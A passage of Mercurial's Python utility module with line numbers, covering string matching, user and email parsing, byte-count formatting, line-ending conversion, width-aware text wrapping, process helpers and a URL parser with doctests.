2562 2562 return lambda x: x >= when
2563 2563 elif " to " in date:
2564 2564 a, b = date.split(" to ")
2565 2565 start, stop = lower(a), upper(b)
2566 2566 return lambda x: x >= start and x <= stop
2567 2567 else:
2568 2568 start, stop = lower(date), upper(date)
2569 2569 return lambda x: x >= start and x <= stop
2570 2570
2571 2571 def stringmatcher(pattern, casesensitive=True):
2572 2572 """
2573 2573 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2574 2574 returns the matcher name, pattern, and matcher function.
2575 2575 missing or unknown prefixes are treated as literal matches.
2576 2576
2577 2577 helper for tests:
2578 2578 >>> def test(pattern, *tests):
2579 2579 ... kind, pattern, matcher = stringmatcher(pattern)
2580 2580 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2581 2581 >>> def itest(pattern, *tests):
2582 2582 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2583 2583 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2584 2584
2585 2585 exact matching (no prefix):
2586 2586 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2587 2587 ('literal', 'abcdefg', [False, False, True])
2588 2588
2589 2589 regex matching ('re:' prefix)
2590 2590 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2591 2591 ('re', 'a.+b', [False, False, True])
2592 2592
2593 2593 force exact matches ('literal:' prefix)
2594 2594 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2595 2595 ('literal', 're:foobar', [False, True])
2596 2596
2597 2597 unknown prefixes are ignored and treated as literals
2598 2598 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2599 2599 ('literal', 'foo:bar', [False, False, True])
2600 2600
2601 2601 case insensitive regex matches
2602 2602 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2603 2603 ('re', 'A.+b', [False, False, True])
2604 2604
2605 2605 case insensitive literal matches
2606 2606 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2607 2607 ('literal', 'ABCDEFG', [False, False, True])
2608 2608 """
2609 2609 if pattern.startswith('re:'):
2610 2610 pattern = pattern[3:]
2611 2611 try:
2612 2612 flags = 0
2613 2613 if not casesensitive:
2614 2614 flags = remod.I
2615 2615 regex = remod.compile(pattern, flags)
2616 2616 except remod.error as e:
2617 2617 raise error.ParseError(_('invalid regular expression: %s')
2618 2618 % e)
2619 2619 return 're', pattern, regex.search
2620 2620 elif pattern.startswith('literal:'):
2621 2621 pattern = pattern[8:]
2622 2622
2623 2623 match = pattern.__eq__
2624 2624
2625 2625 if not casesensitive:
2626 2626 ipat = encoding.lower(pattern)
2627 2627 match = lambda s: ipat == encoding.lower(s)
2628 2628 return 'literal', pattern, match
2629 2629
2630 2630 def shortuser(user):
2631 2631 """Return a short representation of a user name or email address."""
2632 2632 f = user.find('@')
2633 2633 if f >= 0:
2634 2634 user = user[:f]
2635 2635 f = user.find('<')
2636 2636 if f >= 0:
2637 2637 user = user[f + 1:]
2638 2638 f = user.find(' ')
2639 2639 if f >= 0:
2640 2640 user = user[:f]
2641 2641 f = user.find('.')
2642 2642 if f >= 0:
2643 2643 user = user[:f]
2644 2644 return user
2645 2645
2646 2646 def emailuser(user):
2647 2647 """Return the user portion of an email address."""
2648 2648 f = user.find('@')
2649 2649 if f >= 0:
2650 2650 user = user[:f]
2651 2651 f = user.find('<')
2652 2652 if f >= 0:
2653 2653 user = user[f + 1:]
2654 2654 return user
2655 2655
2656 2656 def email(author):
2657 2657 '''get email of author.'''
2658 2658 r = author.find('>')
2659 2659 if r == -1:
2660 2660 r = None
2661 2661 return author[author.find('<') + 1:r]
2662 2662
2663 2663 def ellipsis(text, maxlength=400):
2664 2664 """Trim string to at most maxlength (default: 400) columns in display."""
2665 2665 return encoding.trim(text, maxlength, ellipsis='...')
2666 2666
2667 2667 def unitcountfn(*unittable):
2668 2668 '''return a function that renders a readable count of some quantity'''
2669 2669
2670 2670 def go(count):
2671 2671 for multiplier, divisor, format in unittable:
2672 2672 if abs(count) >= divisor * multiplier:
2673 2673 return format % (count / float(divisor))
2674 2674 return unittable[-1][2] % count
2675 2675
2676 2676 return go
2677 2677
2678 2678 def processlinerange(fromline, toline):
2679 2679 """Check that linerange <fromline>:<toline> makes sense and return a
2680 2680 0-based range.
2681 2681
2682 2682 >>> processlinerange(10, 20)
2683 2683 (9, 20)
2684 2684 >>> processlinerange(2, 1)
2685 2685 Traceback (most recent call last):
2686 2686 ...
2687 2687 ParseError: line range must be positive
2688 2688 >>> processlinerange(0, 5)
2689 2689 Traceback (most recent call last):
2690 2690 ...
2691 2691 ParseError: fromline must be strictly positive
2692 2692 """
2693 2693 if toline - fromline < 0:
2694 2694 raise error.ParseError(_("line range must be positive"))
2695 2695 if fromline < 1:
2696 2696 raise error.ParseError(_("fromline must be strictly positive"))
2697 2697 return fromline - 1, toline
2698 2698
2699 2699 bytecount = unitcountfn(
2700 2700 (100, 1 << 30, _('%.0f GB')),
2701 2701 (10, 1 << 30, _('%.1f GB')),
2702 2702 (1, 1 << 30, _('%.2f GB')),
2703 2703 (100, 1 << 20, _('%.0f MB')),
2704 2704 (10, 1 << 20, _('%.1f MB')),
2705 2705 (1, 1 << 20, _('%.2f MB')),
2706 2706 (100, 1 << 10, _('%.0f KB')),
2707 2707 (10, 1 << 10, _('%.1f KB')),
2708 2708 (1, 1 << 10, _('%.2f KB')),
2709 2709 (1, 1, _('%.0f bytes')),
2710 2710 )
2711 2711
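# bytecount() picks the first matching row of the table above:
#
#     bytecount(500)             # -> '500 bytes'
#     bytecount(1 << 20)         # -> '1.00 MB'
#     bytecount(150 * (1 << 20)) # -> '150 MB'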
2712 2712 # Matches a single EOL which can either be a CRLF where repeated CR
2713 2713 # are removed or a LF. We do not care about old Macintosh files, so a
2714 2714 # stray CR is an error.
2715 2715 _eolre = remod.compile(br'\r*\n')
2716 2716
2717 2717 def tolf(s):
2718 2718 return _eolre.sub('\n', s)
2719 2719
2720 2720 def tocrlf(s):
2721 2721 return _eolre.sub('\r\n', s)
2722 2722
2723 2723 if pycompat.oslinesep == '\r\n':
2724 2724 tonativeeol = tocrlf
2725 2725 fromnativeeol = tolf
2726 2726 else:
2727 2727 tonativeeol = pycompat.identity
2728 2728 fromnativeeol = pycompat.identity
2729 2729
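# The EOL helpers normalize line endings regardless of platform; e.g.:
#
#     tolf(b'a\r\nb\r\r\nc\n')  # -> b'a\nb\nc\n' (CR runs before LF dropped)
#     tocrlf(b'a\nb\r\n')       # -> b'a\r\nb\r\n'
#     tonativeeol(b'x\n')       # -> b'x\r\n' on Windows, unchanged elsewhere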
2730 2730 def escapestr(s):
2731 2731 # call underlying function of s.encode('string_escape') directly for
2732 2732 # Python 3 compatibility
2733 2733 return codecs.escape_encode(s)[0]
2734 2734
2735 2735 def unescapestr(s):
2736 2736 return codecs.escape_decode(s)[0]
2737 2737
2738 2738 def forcebytestr(obj):
2739 2739 """Portably format an arbitrary object (e.g. exception) into a byte
2740 2740 string."""
2741 2741 try:
2742 2742 return pycompat.bytestr(obj)
2743 2743 except UnicodeEncodeError:
2744 2744 # non-ascii string, may be lossy
2745 2745 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2746 2746
2747 2747 def uirepr(s):
2748 2748 # Avoid double backslash in Windows path repr()
2749 2749 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2750 2750
2751 2751 # delay import of textwrap
2752 2752 def MBTextWrapper(**kwargs):
2753 2753 class tw(textwrap.TextWrapper):
2754 2754 """
2755 2755 Extend TextWrapper for width-awareness.
2756 2756
2757 2757 Neither number of 'bytes' in any encoding nor 'characters' is
2758 2758 appropriate to calculate terminal columns for specified string.
2759 2759
2760 2760 Original TextWrapper implementation uses built-in 'len()' directly,
2761 2761 so overriding is needed to use width information of each characters.
2762 2762
2763 2763 In addition, characters classified into 'ambiguous' width are
2764 2764 treated as wide in East Asian area, but as narrow in other.
2765 2765
2766 2766 This requires use decision to determine width of such characters.
2767 2767 """
2768 2768 def _cutdown(self, ucstr, space_left):
2769 2769 l = 0
2770 2770 colwidth = encoding.ucolwidth
2771 2771 for i in xrange(len(ucstr)):
2772 2772 l += colwidth(ucstr[i])
2773 2773 if space_left < l:
2774 2774 return (ucstr[:i], ucstr[i:])
2775 2775 return ucstr, ''
2776 2776
2777 2777 # overriding of base class
2778 2778 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2779 2779 space_left = max(width - cur_len, 1)
2780 2780
2781 2781 if self.break_long_words:
2782 2782 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2783 2783 cur_line.append(cut)
2784 2784 reversed_chunks[-1] = res
2785 2785 elif not cur_line:
2786 2786 cur_line.append(reversed_chunks.pop())
2787 2787
2788 2788 # this overriding code is imported from TextWrapper of Python 2.6
2789 2789 # to calculate columns of string by 'encoding.ucolwidth()'
2790 2790 def _wrap_chunks(self, chunks):
2791 2791 colwidth = encoding.ucolwidth
2792 2792
2793 2793 lines = []
2794 2794 if self.width <= 0:
2795 2795 raise ValueError("invalid width %r (must be > 0)" % self.width)
2796 2796
2797 2797 # Arrange in reverse order so items can be efficiently popped
2798 2798 # from a stack of chucks.
2799 2799 chunks.reverse()
2800 2800
2801 2801 while chunks:
2802 2802
2803 2803 # Start the list of chunks that will make up the current line.
2804 2804 # cur_len is just the length of all the chunks in cur_line.
2805 2805 cur_line = []
2806 2806 cur_len = 0
2807 2807
2808 2808 # Figure out which static string will prefix this line.
2809 2809 if lines:
2810 2810 indent = self.subsequent_indent
2811 2811 else:
2812 2812 indent = self.initial_indent
2813 2813
2814 2814 # Maximum width for this line.
2815 2815 width = self.width - len(indent)
2816 2816
2817 2817 # First chunk on line is whitespace -- drop it, unless this
2818 2818 # is the very beginning of the text (i.e. no lines started yet).
2819 2819 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2820 2820 del chunks[-1]
2821 2821
2822 2822 while chunks:
2823 2823 l = colwidth(chunks[-1])
2824 2824
2825 2825 # Can at least squeeze this chunk onto the current line.
2826 2826 if cur_len + l <= width:
2827 2827 cur_line.append(chunks.pop())
2828 2828 cur_len += l
2829 2829
2830 2830 # Nope, this line is full.
2831 2831 else:
2832 2832 break
2833 2833
2834 2834 # The current line is full, and the next chunk is too big to
2835 2835 # fit on *any* line (not just this one).
2836 2836 if chunks and colwidth(chunks[-1]) > width:
2837 2837 self._handle_long_word(chunks, cur_line, cur_len, width)
2838 2838
2839 2839 # If the last chunk on this line is all whitespace, drop it.
2840 2840 if (self.drop_whitespace and
2841 2841 cur_line and cur_line[-1].strip() == r''):
2842 2842 del cur_line[-1]
2843 2843
2844 2844 # Convert current line back to a string and store it in list
2845 2845 # of all lines (return value).
2846 2846 if cur_line:
2847 2847 lines.append(indent + r''.join(cur_line))
2848 2848
2849 2849 return lines
2850 2850
2851 2851 global MBTextWrapper
2852 2852 MBTextWrapper = tw
2853 2853 return tw(**kwargs)
2854 2854
2855 2855 def wrap(line, width, initindent='', hangindent=''):
2856 2856 maxindent = max(len(hangindent), len(initindent))
2857 2857 if width <= maxindent:
2858 2858 # adjust for weird terminal size
2859 2859 width = max(78, maxindent + 1)
2860 2860 line = line.decode(pycompat.sysstr(encoding.encoding),
2861 2861 pycompat.sysstr(encoding.encodingmode))
2862 2862 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2863 2863 pycompat.sysstr(encoding.encodingmode))
2864 2864 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2865 2865 pycompat.sysstr(encoding.encodingmode))
2866 2866 wrapper = MBTextWrapper(width=width,
2867 2867 initial_indent=initindent,
2868 2868 subsequent_indent=hangindent)
2869 2869 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2870 2870
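# A wrap() sketch with illustrative arguments; input and output are bytes
# in encoding.encoding, and column counting is width-aware for East Asian
# wide characters:
#
#     wrapped = wrap(b'a fairly long byte string that needs folding',
#                    30, initindent=b'  ', hangindent=b'    ')
#     # first line indented two spaces, continuation lines four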
2871 2871 if (pyplatform.python_implementation() == 'CPython' and
2872 2872 sys.version_info < (3, 0)):
2873 2873 # There is an issue in CPython that some IO methods do not handle EINTR
2874 2874 # correctly. The following table shows what CPython version (and functions)
2875 2875 # are affected (buggy: has the EINTR bug, okay: otherwise):
2876 2876 #
2877 2877 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2878 2878 # --------------------------------------------------
2879 2879 # fp.__iter__ | buggy | buggy | okay
2880 2880 # fp.read* | buggy | okay [1] | okay
2881 2881 #
2882 2882 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2883 2883 #
2884 2884 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2885 2885 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2886 2886 #
2887 2887 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2888 2888 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2889 2889 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2890 2890 # fp.__iter__ but not other fp.read* methods.
2891 2891 #
2892 2892 # On modern systems like Linux, the "read" syscall cannot be interrupted
2893 2893 # when reading "fast" files like on-disk files. So the EINTR issue only
2894 2894 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2895 2895 # files approximately as "fast" files and use the fast (unsafe) code path,
2896 2896 # to minimize the performance impact.
2897 2897 if sys.version_info >= (2, 7, 4):
2898 2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 2899 def _safeiterfile(fp):
2900 2900 return iter(fp.readline, '')
2901 2901 else:
2902 2902 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2903 2903 # note: this may block longer than necessary because of bufsize.
2904 2904 def _safeiterfile(fp, bufsize=4096):
2905 2905 fd = fp.fileno()
2906 2906 line = ''
2907 2907 while True:
2908 2908 try:
2909 2909 buf = os.read(fd, bufsize)
2910 2910 except OSError as ex:
2911 2911 # os.read only raises EINTR before any data is read
2912 2912 if ex.errno == errno.EINTR:
2913 2913 continue
2914 2914 else:
2915 2915 raise
2916 2916 line += buf
2917 2917 if '\n' in buf:
2918 2918 splitted = line.splitlines(True)
2919 2919 line = ''
2920 2920 for l in splitted:
2921 2921 if l[-1] == '\n':
2922 2922 yield l
2923 2923 else:
2924 2924 line = l
2925 2925 if not buf:
2926 2926 break
2927 2927 if line:
2928 2928 yield line
2929 2929
2930 2930 def iterfile(fp):
2931 2931 fastpath = True
2932 2932 if type(fp) is file:
2933 2933 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2934 2934 if fastpath:
2935 2935 return fp
2936 2936 else:
2937 2937 return _safeiterfile(fp)
2938 2938 else:
2939 2939 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2940 2940 def iterfile(fp):
2941 2941 return fp
2942 2942
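# iterfile() keeps plain "for line in fp" loops safe from EINTR on slow
# files (pipes, sockets, ttys) under old CPython; usage is transparent
# ('somepath' and consume() are illustrative):
#
#     fp = open(somepath, 'rb')
#     for line in iterfile(fp):
#         consume(line)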
2943 2943 def iterlines(iterator):
2944 2944 for chunk in iterator:
2945 2945 for line in chunk.splitlines():
2946 2946 yield line
2947 2947
2948 2948 def expandpath(path):
2949 2949 return os.path.expanduser(os.path.expandvars(path))
2950 2950
2951 2951 def hgcmd():
2952 2952 """Return the command used to execute current hg
2953 2953
2954 2954 This is different from hgexecutable() because on Windows we want
2955 2955 to avoid things opening new shell windows like batch files, so we
2956 2956 get either the python call or current executable.
2957 2957 """
2958 2958 if mainfrozen():
2959 2959 if getattr(sys, 'frozen', None) == 'macosx_app':
2960 2960 # Env variable set by py2app
2961 2961 return [encoding.environ['EXECUTABLEPATH']]
2962 2962 else:
2963 2963 return [pycompat.sysexecutable]
2964 2964 return gethgcmd()
2965 2965
2966 2966 def rundetached(args, condfn):
2967 2967 """Execute the argument list in a detached process.
2968 2968
2969 2969 condfn is a callable which is called repeatedly and should return
2970 2970 True once the child process is known to have started successfully.
2971 2971 At this point, the child process PID is returned. If the child
2972 2972 process fails to start or finishes before condfn() evaluates to
2973 2973 True, return -1.
2974 2974 """
2975 2975 # Windows case is easier because the child process is either
2976 2976 # successfully starting and validating the condition or exiting
2977 2977 # on failure. We just poll on its PID. On Unix, if the child
2978 2978 # process fails to start, it will be left in a zombie state until
2979 2979 # the parent waits on it, which we cannot do since we expect a
2980 2980 # long-running process on success. Instead we listen for SIGCHLD telling
2981 2981 # us our child process terminated.
2982 2982 terminated = set()
2983 2983 def handler(signum, frame):
2984 2984 terminated.add(os.wait())
2985 2985 prevhandler = None
2986 2986 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2987 2987 if SIGCHLD is not None:
2988 2988 prevhandler = signal.signal(SIGCHLD, handler)
2989 2989 try:
2990 2990 pid = spawndetached(args)
2991 2991 while not condfn():
2992 2992 if ((pid in terminated or not testpid(pid))
2993 2993 and not condfn()):
2994 2994 return -1
2995 2995 time.sleep(0.1)
2996 2996 return pid
2997 2997 finally:
2998 2998 if prevhandler is not None:
2999 2999 signal.signal(signal.SIGCHLD, prevhandler)
3000 3000
3001 3001 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3002 3002 """Return the result of interpolating items in the mapping into string s.
3003 3003
3004 3004 prefix is a single character string, or a two character string with
3005 3005 a backslash as the first character if the prefix needs to be escaped in
3006 3006 a regular expression.
3007 3007
3008 3008 fn is an optional function that will be applied to the replacement text
3009 3009 just before replacement.
3010 3010
3011 3011 escape_prefix is an optional flag that allows using doubled prefix for
3012 3012 its escaping.
3013 3013 """
3014 3014 fn = fn or (lambda s: s)
3015 3015 patterns = '|'.join(mapping.keys())
3016 3016 if escape_prefix:
3017 3017 patterns += '|' + prefix
3018 3018 if len(prefix) > 1:
3019 3019 prefix_char = prefix[1:]
3020 3020 else:
3021 3021 prefix_char = prefix
3022 3022 mapping[prefix_char] = prefix_char
3023 3023 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3024 3024 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3025 3025
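# An interpolate() sketch with hypothetical mappings; with
# escape_prefix=True a doubled prefix escapes itself:
#
#     interpolate(b'%', {b'user': b'alice'}, b'hi %user')
#     # -> b'hi alice'
#     interpolate(br'\$', {b'x': b'1'}, b'$x costs $$2', escape_prefix=True)
#     # -> b'1 costs $2'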
3026 3026 def getport(port):
3027 3027 """Return the port for a given network service.
3028 3028
3029 3029 If port is an integer, it's returned as is. If it's a string, it's
3030 3030 looked up using socket.getservbyname(). If there's no matching
3031 3031 service, error.Abort is raised.
3032 3032 """
3033 3033 try:
3034 3034 return int(port)
3035 3035 except ValueError:
3036 3036 pass
3037 3037
3038 3038 try:
3039 3039 return socket.getservbyname(pycompat.sysstr(port))
3040 3040 except socket.error:
3041 3041 raise Abort(_("no port number associated with service '%s'") % port)
3042 3042
3043 3043 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3044 3044 '0': False, 'no': False, 'false': False, 'off': False,
3045 3045 'never': False}
3046 3046
3047 3047 def parsebool(s):
3048 3048 """Parse s into a boolean.
3049 3049
3050 3050 If s is not a valid boolean, returns None.
3051 3051 """
3052 3052 return _booleans.get(s.lower(), None)
3053 3053
3054 3054 _hextochr = dict((a + b, chr(int(a + b, 16)))
3055 3055 for a in string.hexdigits for b in string.hexdigits)
3056 3056
3057 3057 class url(object):
3058 3058 r"""Reliable URL parser.
3059 3059
3060 3060 This parses URLs and provides attributes for the following
3061 3061 components:
3062 3062
3063 3063 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3064 3064
3065 3065 Missing components are set to None. The only exception is
3066 3066 fragment, which is set to '' if present but empty.
3067 3067
3068 3068 If parsefragment is False, fragment is included in query. If
3069 3069 parsequery is False, query is included in path. If both are
3070 3070 False, both fragment and query are included in path.
3071 3071
3072 3072 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3073 3073
3074 3074 Note that for backward compatibility reasons, bundle URLs do not
3075 3075 take host names. That means 'bundle://../' has a path of '../'.
3076 3076
3077 3077 Examples:
3078 3078
3079 3079 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3080 3080 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3081 3081 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3082 3082 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3083 3083 >>> url(b'file:///home/joe/repo')
3084 3084 <url scheme: 'file', path: '/home/joe/repo'>
3085 3085 >>> url(b'file:///c:/temp/foo/')
3086 3086 <url scheme: 'file', path: 'c:/temp/foo/'>
3087 3087 >>> url(b'bundle:foo')
3088 3088 <url scheme: 'bundle', path: 'foo'>
3089 3089 >>> url(b'bundle://../foo')
3090 3090 <url scheme: 'bundle', path: '../foo'>
3091 3091 >>> url(br'c:\foo\bar')
3092 3092 <url path: 'c:\\foo\\bar'>
3093 3093 >>> url(br'\\blah\blah\blah')
3094 3094 <url path: '\\\\blah\\blah\\blah'>
3095 3095 >>> url(br'\\blah\blah\blah#baz')
3096 3096 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3097 3097 >>> url(br'file:///C:\users\me')
3098 3098 <url scheme: 'file', path: 'C:\\users\\me'>
3099 3099
3100 3100 Authentication credentials:
3101 3101
3102 3102 >>> url(b'ssh://joe:xyz@x/repo')
3103 3103 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3104 3104 >>> url(b'ssh://joe@x/repo')
3105 3105 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3106 3106
3107 3107 Query strings and fragments:
3108 3108
3109 3109 >>> url(b'http://host/a?b#c')
3110 3110 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3111 3111 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3112 3112 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3113 3113
3114 3114 Empty path:
3115 3115
3116 3116 >>> url(b'')
3117 3117 <url path: ''>
3118 3118 >>> url(b'#a')
3119 3119 <url path: '', fragment: 'a'>
3120 3120 >>> url(b'http://host/')
3121 3121 <url scheme: 'http', host: 'host', path: ''>
3122 3122 >>> url(b'http://host/#a')
3123 3123 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3124 3124
3125 3125 Only scheme:
3126 3126
3127 3127 >>> url(b'http:')
3128 3128 <url scheme: 'http'>
3129 3129 """
3130 3130
3131 3131 _safechars = "!~*'()+"
3132 3132 _safepchars = "/!~*'()+:\\"
3133 3133 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3134 3134
3135 3135 def __init__(self, path, parsequery=True, parsefragment=True):
3136 3136 # We slowly chomp away at path until we have only the path left
3137 3137 self.scheme = self.user = self.passwd = self.host = None
3138 3138 self.port = self.path = self.query = self.fragment = None
3139 3139 self._localpath = True
3140 3140 self._hostport = ''
3141 3141 self._origpath = path
3142 3142
3143 3143 if parsefragment and '#' in path:
3144 3144 path, self.fragment = path.split('#', 1)
3145 3145
3146 3146 # special case for Windows drive letters and UNC paths
3147 3147 if hasdriveletter(path) or path.startswith('\\\\'):
3148 3148 self.path = path
3149 3149 return
3150 3150
3151 3151 # For compatibility reasons, we can't handle bundle paths as
3152 3152 # normal URLS
3153 3153 if path.startswith('bundle:'):
3154 3154 self.scheme = 'bundle'
3155 3155 path = path[7:]
3156 3156 if path.startswith('//'):
3157 3157 path = path[2:]
3158 3158 self.path = path
3159 3159 return
3160 3160
3161 3161 if self._matchscheme(path):
3162 3162 parts = path.split(':', 1)
3163 3163 if parts[0]:
3164 3164 self.scheme, path = parts
3165 3165 self._localpath = False
3166 3166
3167 3167 if not path:
3168 3168 path = None
3169 3169 if self._localpath:
3170 3170 self.path = ''
3171 3171 return
3172 3172 else:
3173 3173 if self._localpath:
3174 3174 self.path = path
3175 3175 return
3176 3176
3177 3177 if parsequery and '?' in path:
3178 3178 path, self.query = path.split('?', 1)
3179 3179 if not path:
3180 3180 path = None
3181 3181 if not self.query:
3182 3182 self.query = None
3183 3183
3184 3184 # // is required to specify a host/authority
3185 3185 if path and path.startswith('//'):
3186 3186 parts = path[2:].split('/', 1)
3187 3187 if len(parts) > 1:
3188 3188 self.host, path = parts
3189 3189 else:
3190 3190 self.host = parts[0]
3191 3191 path = None
3192 3192 if not self.host:
3193 3193 self.host = None
3194 3194 # path of file:///d is /d
3195 3195 # path of file:///d:/ is d:/, not /d:/
3196 3196 if path and not hasdriveletter(path):
3197 3197 path = '/' + path
3198 3198
3199 3199 if self.host and '@' in self.host:
3200 3200 self.user, self.host = self.host.rsplit('@', 1)
3201 3201 if ':' in self.user:
3202 3202 self.user, self.passwd = self.user.split(':', 1)
3203 3203 if not self.host:
3204 3204 self.host = None
3205 3205
3206 3206 # Don't split on colons in IPv6 addresses without ports
3207 3207 if (self.host and ':' in self.host and
3208 3208 not (self.host.startswith('[') and self.host.endswith(']'))):
3209 3209 self._hostport = self.host
3210 3210 self.host, self.port = self.host.rsplit(':', 1)
3211 3211 if not self.host:
3212 3212 self.host = None
3213 3213
3214 3214 if (self.host and self.scheme == 'file' and
3215 3215 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3216 3216 raise Abort(_('file:// URLs can only refer to localhost'))
3217 3217
3218 3218 self.path = path
3219 3219
3220 3220 # leave the query string escaped
3221 3221 for a in ('user', 'passwd', 'host', 'port',
3222 3222 'path', 'fragment'):
3223 3223 v = getattr(self, a)
3224 3224 if v is not None:
3225 3225 setattr(self, a, urlreq.unquote(v))
3226 3226
3227 3227 @encoding.strmethod
3228 3228 def __repr__(self):
3229 3229 attrs = []
3230 3230 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3231 3231 'query', 'fragment'):
3232 3232 v = getattr(self, a)
3233 3233 if v is not None:
3234 3234 attrs.append('%s: %r' % (a, v))
3235 3235 return '<url %s>' % ', '.join(attrs)
3236 3236
3237 3237 def __bytes__(self):
3238 3238 r"""Join the URL's components back into a URL string.
3239 3239
3240 3240 Examples:
3241 3241
3242 3242 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3243 3243 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3244 3244 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3245 3245 'http://user:pw@host:80/?foo=bar&baz=42'
3246 3246 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3247 3247 'http://user:pw@host:80/?foo=bar%3dbaz'
3248 3248 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3249 3249 'ssh://user:pw@[::1]:2200//home/joe#'
3250 3250 >>> bytes(url(b'http://localhost:80//'))
3251 3251 'http://localhost:80//'
3252 3252 >>> bytes(url(b'http://localhost:80/'))
3253 3253 'http://localhost:80/'
3254 3254 >>> bytes(url(b'http://localhost:80'))
3255 3255 'http://localhost:80/'
3256 3256 >>> bytes(url(b'bundle:foo'))
3257 3257 'bundle:foo'
3258 3258 >>> bytes(url(b'bundle://../foo'))
3259 3259 'bundle:../foo'
3260 3260 >>> bytes(url(b'path'))
3261 3261 'path'
3262 3262 >>> bytes(url(b'file:///tmp/foo/bar'))
3263 3263 'file:///tmp/foo/bar'
3264 3264 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3265 3265 'file:///c:/tmp/foo/bar'
3266 3266 >>> print(url(br'bundle:foo\bar'))
3267 3267 bundle:foo\bar
3268 3268 >>> print(url(br'file:///D:\data\hg'))
3269 3269 file:///D:\data\hg
3270 3270 """
3271 3271 if self._localpath:
3272 3272 s = self.path
3273 3273 if self.scheme == 'bundle':
3274 3274 s = 'bundle:' + s
3275 3275 if self.fragment:
3276 3276 s += '#' + self.fragment
3277 3277 return s
3278 3278
3279 3279 s = self.scheme + ':'
3280 3280 if self.user or self.passwd or self.host:
3281 3281 s += '//'
3282 3282 elif self.scheme and (not self.path or self.path.startswith('/')
3283 3283 or hasdriveletter(self.path)):
3284 3284 s += '//'
3285 3285 if hasdriveletter(self.path):
3286 3286 s += '/'
3287 3287 if self.user:
3288 3288 s += urlreq.quote(self.user, safe=self._safechars)
3289 3289 if self.passwd:
3290 3290 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3291 3291 if self.user or self.passwd:
3292 3292 s += '@'
3293 3293 if self.host:
3294 3294 if not (self.host.startswith('[') and self.host.endswith(']')):
3295 3295 s += urlreq.quote(self.host)
3296 3296 else:
3297 3297 s += self.host
3298 3298 if self.port:
3299 3299 s += ':' + urlreq.quote(self.port)
3300 3300 if self.host:
3301 3301 s += '/'
3302 3302 if self.path:
3303 3303 # TODO: similar to the query string, we should not unescape the
3304 3304 # path when we store it, the path might contain '%2f' = '/',
3305 3305 # which we should *not* escape.
3306 3306 s += urlreq.quote(self.path, safe=self._safepchars)
3307 3307 if self.query:
3308 3308 # we store the query in escaped form.
3309 3309 s += '?' + self.query
3310 3310 if self.fragment is not None:
3311 3311 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3312 3312 return s
3313 3313
3314 3314 __str__ = encoding.strmethod(__bytes__)
3315 3315
3316 3316 def authinfo(self):
3317 3317 user, passwd = self.user, self.passwd
3318 3318 try:
3319 3319 self.user, self.passwd = None, None
3320 3320 s = bytes(self)
3321 3321 finally:
3322 3322 self.user, self.passwd = user, passwd
3323 3323 if not self.user:
3324 3324 return (s, None)
3325 3325 # authinfo[1] is passed to urllib2 password manager, and its
3326 3326 # URIs must not contain credentials. The host is passed in the
3327 3327 # URIs list because Python < 2.4.3 uses only that to search for
3328 3328 # a password.
3329 3329 return (s, (None, (s, self.host),
3330 3330 self.user, self.passwd or ''))
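
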